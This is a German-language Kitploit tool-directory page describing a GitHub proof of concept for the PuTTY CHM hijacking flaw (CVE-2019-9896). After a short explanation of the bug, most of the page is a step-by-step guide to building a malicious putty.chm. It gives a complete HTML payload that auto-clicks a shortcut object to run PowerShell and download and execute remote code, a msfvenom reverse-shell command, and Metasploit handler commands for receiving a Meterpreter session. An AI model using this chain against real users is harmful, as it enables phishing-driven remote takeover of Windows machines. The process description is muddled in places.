Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/yasinyilmaz/vuln-chm-hijack
Phishing-ToolsPayload-GenerierungExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubyasinyilmaz/vuln-chm-hijack

vuln-chm-hijack

Potenzielle Ausführung von Schadcode durch CHM-Entführung (CVE-2019-9896)

Repository anzeigen
7916vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PuTTY-Sicherheitslücke vuln-chm-hijack

Potenzielle Ausführung von bösartigem Code durch CHM-Entführung

Über

Bis einschließlich Version 0.70 suchte das Tool beim Start der Online-Hilfe in einem der Windows-PuTTY-GUI-Tools seine Hilfedatei, indem es neben seiner eigenen ausführbaren Datei suchte.

Wenn Sie PuTTY aus einem Verzeichnis ausgeführt haben, in das nicht zusammenhängender Code Dateien ablegen konnte (z.B. direkt aus dem Standard-Download-Verzeichnis eines Browsers), bedeutet dies, dass PuTTY, wenn jemand es schaffte, eine Datei namens putty.chm in dieses Verzeichnis zu bekommen (z.B. indem er Sie dazu verleitete, auf einen Download-Link mit diesem Namen zu klicken), diese Datei als echte Hilfedatei betrachten und an htmlhelp.exe übergeben würde.

Dies ist eine Sicherheitslücke, da HTML-Hilfedateien (.chm) wiederum Code ihrer Wahl ausführen können, z.B. durch Einbettung eines -HTML-Elements, das eine Windows-Verknüpfung ist, plus JavaScript, um darauf zu klicken.

Mehr Details: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-chm-hijack.html

Was ist eine CHM-Datei?

CHM ist eine Erweiterung für das kompilierte HTML-Dateiformat, das am häufigsten von Microsofts HTML-basiertem Hilfeprogramm verwendet wird. Es kann viele komprimierte HTML-Dokumente sowie die damit verknüpften Bilder und JavaScript enthalten. Zu den Funktionen von CHM gehören ein Inhaltsverzeichnis, ein Index und eine Volltextsuche.

Wurde dies schon früher verwendet?

In der Vergangenheit verwendeten Bedrohungsakteure CHM-Dateien, um die Hintertürdatei abzulegen, die häufig bei gezielten Angriffen eingesetzt wird.

Einige Beispiele:

https://www.bleepingcomputer.com/news/security/malicious-chm-files-being-used-to-install-brazilian-banking-trojans/ https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/

Verfahren zum Erstellen einer schädlichen CHM-Datei

Wir benötigen das HTML Help Workshop-Toolkit, um eine CHM-Datei zu erstellen. Nach der Installation starten Sie das HTML Help Workshop-Tool.

Schritte

Klicken Sie auf Datei > Neu > Projekt und folgen Sie den obigen Schritten:

Creating HTML Help Project

  1. Neuer Projektbildschirm > Weiter > Durchsuchen

  2. Geben Sie den Namen Ihrer Projektdatei und den Ort an, an dem sie erstellt werden soll.

Geben Sie als Dateinamen putty ein und klicken Sie auf "Öffnen"

Specify your HTML Help Project

  1. Wenn Sie bereits eine HTML-Datei erstellt haben, die Sie in Ihr Projekt aufnehmen möchten.

Wählen Sie HTML-Dateien (.htm)

Geben Sie an, wo sich Ihre .htm-Dateien befinden.

Klicken Sie auf "Hinzufügen..." und wählen Sie ein bereits erstelltes Verzeichnis für den Exploit, um Ihre schädliche Datei wie putty.htm abzulegen.

Select a HTM file

  1. Der Assistent erstellt ein neues HTML-Hilfeprojekt. Wir müssen Änderungen vornehmen.

  2. Doppelklicken Sie im Tool auf die erstellte htm-Datei, um sie zu bearbeiten, und fügen Sie dann den folgenden Code ein, um eine grundlegende Hilfedatei zu erstellen:

root@kitploit:~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<Title>putty</Title>
</HEAD>
<BODY>


</BODY>
</HTML>

  1. Nun erstellen wir ein Button-Objekt, das beim Klicken die schädliche exe startet. Zusätzlich zum Objekt fügen wir einen Skriptteil hinzu, der den Button automatisch anklickt, wenn das Dokument geöffnet wird:
root@kitploit:~
<html>
<title> PuTTY Help </title>
<head>
</head>
<body>

<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -NoProfile -WindowsStyle 1 -c -IEX (New-Object Net.WebClient).DownloadString('{YOUR MALICIOUS FILE URL}')">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>

<h2 align=center> PuTTY CHM </h2>
<p><h3 align=center> Welcome! </h3></p>
</body>
</html>

Create malicious file

  1. Der PowerShell-Befehl stellt eine Verbindung zur angegebenen Remote-URL her und führt den Meterpreter aus, den die Site zurückgibt. Dieses Remote-Skript kann ein anderes PowerShell-Skript (.ps) oder ein Meterpreter-Payload für Windows sein.

Wie erstelle ich ein einfaches TCP-Meterpreter-Payload für Windows?

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST={YOUR IP} LPORT={PORT } -f exe > malware.exe

Wenn Sie auf die Hilfeschaltfläche doppelklicken, wird eine putty.exe als Kind von malware.exe gestartet, die der Interpreter der CHM-Binärdatei ist. (Ihre schädliche putty.chm und putty.exe sollten im selben Verzeichnis liegen.)

Spawns a malware

Wie erhalte ich die Meterpreter-Shell?

root@kitploit:~
msfconsole 
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost {YOUR IP}
lhost => {YOUR IP}
msf exploit(multi/handler) > set lport {PORT}
lport => {PORT}
msf exploit(multi/handler) > run

Ressourcen:

  1. https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-chm-hijack.html
  2. https://safe-cyberdefense.com/hide-malware-microsoft-html-interpretors/

Tool herunterladen